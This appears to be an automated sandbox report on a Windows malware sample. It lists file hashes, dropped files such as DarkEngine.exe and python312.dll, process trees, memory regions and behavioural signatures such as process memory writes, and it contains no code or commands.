C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6317adf4fbc43ea2fd68861fafd57155 |
| SHA1 | 6b87c718893c83c6eed2767e8d9cbc6443e31913 |
| SHA256 | c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af |
| SHA512 | 17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c6aae9fb57ebd2ae201e8d174d820246 |
| SHA1 | 58140d968de47bcf9c78938988a99369bbdb1f51 |
| SHA256 | bbc39a8da61fd8ec0d64e708e1ab4986f7fdf580581e464629bf040c595f7c08 |
| SHA512 | 5959f7dab47bc4bad03635f497ca48f2e0740375528afddfc50964e54983e56df5970b25b8d8b28f1aa73cd6233fac83c634a311e759c58a365570e4862c3e3c |
memory/3596-379-0x00007FF71B6F0000-0x00007FF71BFA0000-memory.dmp
memory/392-380-0x00007FF7F6970000-0x00007FF7F7466000-memory.dmp
memory/392-415-0x00007FF7F6970000-0x00007FF7F7466000-memory.dmp
memory/3596-419-0x00007FF71B6F0000-0x00007FF71BFA0000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-04 21:29
Reported
2024-11-04 21:31
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2908 wrote to memory of 2332 | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe |
| PID 2908 wrote to memory of 2332 | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe |
| PID 2908 wrote to memory of 2332 | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
"C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe
C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe
| MD5 | a4049a76d21c26ef9017251d9d02a102 |
| SHA1 | ea578987927da1752e4977e922367eea555c02b7 |
| SHA256 | 839f44ebf68fca6a94a9dd13e5d81821f80415eb2436ce021d22889dd46bec50 |
| SHA512 | 1e59b0620882e52a7b2dfc3aaa09d7f7c96a4a22e9668d695c10c6b287493307780ab3b4245846b243ac9f902df74b21cb39369f559677d7a8eaa810a62fd242 |
C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\python312.dll
| MD5 | 166cc2f997cba5fc011820e6b46e8ea7 |
| SHA1 | d6179213afea084f02566ea190202c752286ca1f |
| SHA256 | c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546 |
| SHA512 | 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb |
memory/2332-26-0x000000013F0F0000-0x000000013FBE6000-memory.dmp
memory/2908-47-0x000000013FA90000-0x0000000140340000-memory.dmp